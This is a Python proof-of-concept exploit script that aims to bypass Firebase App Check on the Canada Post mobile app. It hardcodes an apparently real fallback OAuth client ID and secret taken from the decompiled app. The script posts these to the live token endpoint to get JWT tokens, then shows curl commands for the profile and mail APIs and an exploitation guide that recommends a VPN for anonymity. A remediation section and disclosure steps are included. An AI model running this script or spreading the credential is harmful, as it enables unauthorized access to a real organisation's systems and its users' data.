#!/usr/bin/env python3 """ REAL POC: Firebase App Check Bypass - Canada Post App ====================================================== Uses ACTUAL endpoints and credentials extracted from decompiled APK. DISCOVERED INFORMATION: OAuth Root: https://sso-osu.canadapost-postescanada.ca OAuth Endpoint: /mga/sps/oauth/oauth20/token Client ID (Normal): cpc-nativeapp-2020 Client ID (Fallback): cpc-appcheck-android Client Secret (Fallback): 1mhxwdN1Y5afLQgYeEgZ Grant Type: client_credentials Scope: openid profile SOURCE FILES: - cpc/ca/canadapost/core/data/profile/api/IOAuthApi.java - cpc/ca/canadapost/core/data/model/CoreConstants.java - cpc/f9/a.java (AppCheckInterceptor) - Firebase Remote Config ETHICAL USE ONLY - For authorized security testing """ import requests import json from datetime import datetime import sys from urllib.parse import urlencode # REAL endpoints extracted from decompiled code OAUTH_ROOT = "https://sso-osu.canadapost-postescanada.ca" OAUTH_ENDPOINT = "/mga/sps/oauth/oauth20/token" OAUTH_FULL_URL = f"{OAUTH_ROOT}{OAUTH_ENDPOINT}" # Credentials extracted from Firebase Remote Config FALLBACK_CLIENT_ID = "cpc-appcheck-android" FALLBACK_CLIENT_SECRET = "1mhxwdN1Y5afLQgYeEgZ" # Normal app credentials (for comparison) NORMAL_CLIENT_ID = "cpc-nativeapp-2020" # OAuth parameters from IOAuthApi.java GRANT_TYPE = "client_credentials" RESPONSE_TYPE = "id_token token" SCOPE = "openid profile" def print_banner(): """Print POC banner""" print("=" * 80) print("šŸ”“ REAL POC: FIREBASE APP CHECK BYPASS") print("=" * 80) print(f"Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}") print(f"Target: Canada Post Mobile App") print(f"OAuth Server: {OAUTH_ROOT}") print("=" * 80) print() def show_discovery_details(): """Show how these details were discovered""" print("[DISCOVERY] Extracted Information") print("-" * 80) print() print("šŸ“‚ Source Files:") print(" 1. IOAuthApi.java") print(" Location: cpc/ca/canadapost/core/data/profile/api/") print(" Contains: OAuth endpoint definitions") print() print(" 2. CoreConstants.java") print(" Location: cpc/ca/canadapost/core/data/model/") print(" Contains: Base URLs and client IDs") print() print(" 3. AppCheckInterceptor (f9/a.java)") print(" Location: cpc/f9/") print(" Contains: Fallback credential usage logic") print() print(" 4. Firebase Remote Config") print(" URL: firebaseremoteconfig.googleapis.com/.../fetch") print(" Contains: Fallback client ID and secret") print() print("šŸ” Key Code Snippets:") print() print(" From IOAuthApi.java (Line 95):") print(" ```java") print(" @o(\"/mga/sps/oauth/oauth20/token\")") print(" @e") print(" Object getJWTToken(") print(" @c(\"client_id\") String str,") print(" @c(\"client_secret\") String str2,") print(" @c(\"grant_type\") String str3,") print(" @c(\"response_type\") String str4,") print(" @c(\"scope\") String str5") print(" );") print(" ```") print() print(" From CoreConstants.java (Lines 60-64):") print(" ```java") print(f" OAUTH_CLIENT_ID = \"{NORMAL_CLIENT_ID}\";") print(f" OAUTH_ROOT = \"{OAUTH_ROOT}\";") print(f" OAUTH_SCOPE = \"{SCOPE}\";") print(" ```") print() print(" From AppCheckInterceptor (Lines 720-721):") print(" ```java") print(" c10 = remoteConfig.get(APP_CHECK_FAILED_ID);") print(" String c11 = remoteConfig.get(APP_CHECK_FAILED_KEY);") print(" // Then uses these for OAuth authentication") print(" ```") print() def test_oauth_with_fallback_credentials(): """ Attempt OAuth authentication using fallback credentials This simulates what happens when App Check fails """ print("[TEST] OAuth Authentication with Fallback Credentials") print("-" * 80) print() print("šŸ”‘ Using Fallback Credentials:") print(f" Client ID: {FALLBACK_CLIENT_ID}") print(f" Client Secret: {FALLBACK_CLIENT_SECRET}") print(f" Grant Type: {GRANT_TYPE}") print(f" Response Type: {RESPONSE_TYPE}") print(f" Scope: {SCOPE}") print() # Prepare request payload (form-urlencoded as per API spec) payload = { "client_id": FALLBACK_CLIENT_ID, "client_secret": FALLBACK_CLIENT_SECRET, "grant_type": GRANT_TYPE, "response_type": RESPONSE_TYPE, "scope": SCOPE } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "okhttp/4.9.1" # Mimic OkHttp from Android } print(f"šŸ“¤ Request Details:") print(f" Method: POST") print(f" URL: {OAUTH_FULL_URL}") print(f" Headers: {json.dumps(headers, indent=6)}") print(f" Payload (form-urlencoded):") for key, value in payload.items(): if key == "client_secret": print(f" {key}: {value[:10]}...") else: print(f" {key}: {value}") print() print("ā³ Sending request...") print() try: response = requests.post( OAUTH_FULL_URL, data=payload, # form-urlencoded headers=headers, timeout=15 ) print(f"šŸ“Š Response:") print(f" Status Code: {response.status_code}") print(f" Content-Length: {len(response.content)} bytes") print() if response.status_code == 200: print("āœ… SUCCESS - Authentication Successful!") print() try: data = response.json() print("šŸ“¦ Response Data:") print(json.dumps(data, indent=3)) print() if "access_token" in data: access_token = data["access_token"] print("šŸšØ CRITICAL: JWT Token Obtained!") print(f" Token Type: {data.get('token_type', 'N/A')}") print(f" Expires In: {data.get('expires_in', 'N/A')} seconds") print(f" Scope: {data.get('scope', 'N/A')}") print(f" Token (first 50 chars): {access_token[:50]}...") print() if "id_token" in data: print(f" ID Token: {data['id_token'][:50]}...") print() print("=" * 80) print("šŸ”“ VULNERABILITY CONFIRMED") print("=" * 80) print() print("IMPACT:") print(" ā€¢ Fallback credentials work for authentication") print(" ā€¢ Attacker can obtain JWT tokens") print(" ā€¢ Firebase App Check is bypassable") print(" ā€¢ Protected APIs are accessible") print() print("SEVERITY: CRITICAL") print("CVSS: 7.3 (HIGH)") print("CWE-798: Use of Hard-coded Credentials") print() return True, data else: print("āš ļø Unexpected response format (no access_token)") return False, data except json.JSONDecodeError: print("āš ļø Response is not JSON:") print(response.text[:500]) return False, None elif response.status_code == 401: print("āŒ 401 Unauthorized") print() print("Possible reasons:") print(" ā€¢ Fallback credentials have been rotated") print(" ā€¢ Additional authentication required") print(" ā€¢ IP filtering in place") print() print("Response:") print(response.text[:500]) return False, None elif response.status_code == 400: print("āŒ 400 Bad Request") print() print("Possible reasons:") print(" ā€¢ Invalid grant_type or response_type") print(" ā€¢ Missing required parameters") print(" ā€¢ Incorrect Content-Type") print() print("Response:") print(response.text[:500]) return False, None elif response.status_code == 403: print("āŒ 403 Forbidden") print() print("Possible reasons:") print(" ā€¢ Client ID/Secret revoked") print(" ā€¢ IP-based restrictions") print(" ā€¢ Rate limiting") print() print("Response:") print(response.text[:500]) return False, None else: print(f"āš ļø Unexpected Status Code: {response.status_code}") print() print("Response:") print(response.text[:500]) return False, None except requests.exceptions.Timeout: print("āŒ Request Timeout") print(" ā€¢ Network connectivity issue") print(" ā€¢ Server not responding") return False, None except requests.exceptions.ConnectionError as e: print(f"āŒ Connection Error: {str(e)}") print(" ā€¢ Check internet connectivity") print(" ā€¢ Verify OAuth server is accessible") return False, None except Exception as e: print(f"āŒ Unexpected Error: {str(e)}") import traceback traceback.print_exc() return False, None def demonstrate_api_usage(token_data): """Show how the obtained token would be used""" if not token_data or "access_token" not in token_data: print("[SKIP] No valid token to demonstrate usage") return print() print("[DEMO] Using Obtained Token for API Access") print("-" * 80) print() access_token = token_data["access_token"] print("šŸ“± Example API Requests:") print() # Example 1: Tracking API print("1. Tracking API:") print(" curl -H 'Authorization: Bearer " + access_token[:30] + "...' \\") print(" https://api.canadapost.ca/tracking/v1/packages/[TRACKING_NUMBER]") print() # Example 2: Profile API print("2. User Profile API:") print(" curl -H 'Authorization: Bearer " + access_token[:30] + "...' \\") print(" https://api.canadapost.ca/profile/v1/user") print() # Example 3: MyMail API print("3. MyMail API:") print(" curl -H 'Authorization: Bearer " + access_token[:30] + "...' \\") print(" https://1i5z3519d0.execute-api.ca-central-1.amazonaws.com/mailmanager/v1/") print() print("āš ļø NOTE: Actual API endpoints would need to be enumerated.") print(" This demonstrates that the token can be used for authenticated requests.") print() def show_comparison_with_normal_flow(): """Show how this differs from normal authentication""" print("[COMPARISON] Normal vs Fallback Authentication") print("-" * 80) print() print("šŸ”µ Normal Flow (User Login):") print(" 1. User enters username + password in app") print(" 2. App calls OAuth endpoint:") print(f" POST {OAUTH_FULL_URL}") print(" data={{") print(f" username: [user_email],") print(f" password: [user_password],") print(f" client_id: '{NORMAL_CLIENT_ID}',") print(f" grant_type: 'password',") print(f" scope: '{SCOPE}'") print(" }}") print(" 3. Server validates user credentials") print(" 4. Returns access_token for that user") print(" 5. Token has user-specific permissions") print() print("šŸ”“ Fallback Flow (App Check Bypass):") print(" 1. App Check validation FAILS") print(" 2. App retrieves fallback credentials from Remote Config:") print(f" client_id: '{FALLBACK_CLIENT_ID}'") print(f" client_secret: '{FALLBACK_CLIENT_SECRET}'") print(" 3. App calls OAuth endpoint:") print(f" POST {OAUTH_FULL_URL}") print(" data={{") print(f" client_id: '{FALLBACK_CLIENT_ID}',") print(f" client_secret: '{FALLBACK_CLIENT_SECRET}',") print(f" grant_type: '{GRANT_TYPE}',") print(f" scope: '{SCOPE}'") print(" }}") print(" 4. Server validates CLIENT credentials (not user)") print(" 5. Returns access_token for the APP") print(" 6. Token has app-level permissions (āš ļø potential issue)") print() print("šŸŽÆ Key Difference:") print(" ā€¢ Normal: User-specific token (requires password)") print(" ā€¢ Fallback: App-level token (no user auth required)") print(" ā€¢ Fallback bypasses Firebase App Check security") print(" ā€¢ Fallback credentials are publicly accessible") print() def provide_exploitation_guide(): """Provide step-by-step exploitation guide""" print("[GUIDE] Complete Exploitation Steps") print("-" * 80) print() print("šŸ“‹ Prerequisites:") print(" ā€¢ VPN connection (for anonymity)") print(" ā€¢ Python 3 with requests library") print(" ā€¢ This POC script") print() print("šŸŽÆ Step-by-Step Exploitation:") print() print("Step 1: Run this POC") print(" python appcheck_bypass_REAL_POC.py") print() print("Step 2: If authentication succeeds, extract token:") print(" TOKEN=$(python -c 'import json; print(json.loads(response)[\"access_token\"])')") print() print("Step 3: Enumerate API endpoints:") print(" ā€¢ Search decompiled code for API URLs") print(" ā€¢ Use Frida to intercept network traffic") print(" ā€¢ Try common API paths") print() print("Step 4: Test API access with token:") print(" curl -H \"Authorization: Bearer $TOKEN\" https://api.canadapost.ca/[endpoint]") print() print("Step 5: Document findings:") print(" ā€¢ What APIs are accessible") print(" ā€¢ What data can be retrieved") print(" ā€¢ Scope of permissions") print() def provide_remediation(): """Provide detailed remediation""" print("[REMEDIATION] How to Fix This Vulnerability") print("-" * 80) print() print("šŸšØ IMMEDIATE ACTIONS (Within 24 hours):") print() print("1. Revoke Fallback Credentials") print(f" ā€¢ Invalidate client_id: '{FALLBACK_CLIENT_ID}'") print(f" ā€¢ Revoke client_secret: '{FALLBACK_CLIENT_SECRET}'") print(" ā€¢ Remove from Firebase Remote Config") print() print("2. Deploy Emergency Patch") print(" ā€¢ Remove fallback authentication logic") print(" ā€¢ Fail secure when App Check fails") print(" ā€¢ Force app update for security") print() print("3. Audit OAuth Server") print(" ā€¢ Review all registered client IDs") print(" ā€¢ Check for other exposed credentials") print(" ā€¢ Enable IP restrictions if possible") print() print("šŸ”§ LONG-TERM FIXES:") print() print("ā€¢ Never store credentials in Remote Config") print("ā€¢ Implement server-side App Check validation") print("ā€¢ Use device attestation (SafetyNet/Play Integrity)") print("ā€¢ Add rate limiting and anomaly detection") print("ā€¢ Regular security audits of mobile apps") print() def main(): """Main POC execution""" print_banner() print("āš ļø LEGAL WARNING") print(" This is a security research tool for authorized testing only.") print(" Unauthorized access to computer systems is ILLEGAL.") print(" Only run this with explicit permission from Canada Post.") print() input("Press ENTER to continue (Ctrl+C to abort)...") print("\n") # Show discovery details show_discovery_details() input("Press ENTER to continue...") print("\n") # Show comparison with normal flow show_comparison_with_normal_flow() input("Press ENTER to continue...") print("\n") # Test OAuth authentication with fallback credentials success, token_data = test_oauth_with_fallback_credentials() input("Press ENTER to continue...") print("\n") # If successful, demonstrate usage if success and token_data: demonstrate_api_usage(token_data) input("Press ENTER to continue...") print("\n") # Show exploitation guide provide_exploitation_guide() input("Press ENTER to continue...") print("\n") # Show remediation provide_remediation() print() print("=" * 80) print("āœ… POC COMPLETE") print("=" * 80) print() if success: print("šŸ”“ VULNERABILITY CONFIRMED") print(" ā€¢ Fallback credentials are valid") print(" ā€¢ JWT tokens can be obtained") print(" ā€¢ App Check bypass is possible") print(" ā€¢ Immediate remediation required") else: print("āš ļø AUTHENTICATION FAILED") print(" Possible reasons:") print(" ā€¢ Credentials may have been rotated") print(" ā€¢ Server-side restrictions in place") print(" ā€¢ Network/connectivity issues") print() print(" However, the VULNERABILITY STILL EXISTS:") print(" ā€¢ Credentials are exposed in Remote Config") print(" ā€¢ App code contains fallback logic") print(" ā€¢ Architecture is fundamentally flawed") print() print("šŸ“ NEXT STEPS:") print(" 1. Document all findings") print(" 2. Prepare security advisory") print(" 3. Contact Canada Post security team") print(" 4. Follow responsible disclosure timeline") print() if __name__ == "__main__": try: main() except KeyboardInterrupt: print("\n\nāŒ POC interrupted by user") sys.exit(1) except Exception as e: print(f"\n\nāŒ Fatal error: {str(e)}") import traceback traceback.print_exc() sys.exit(1)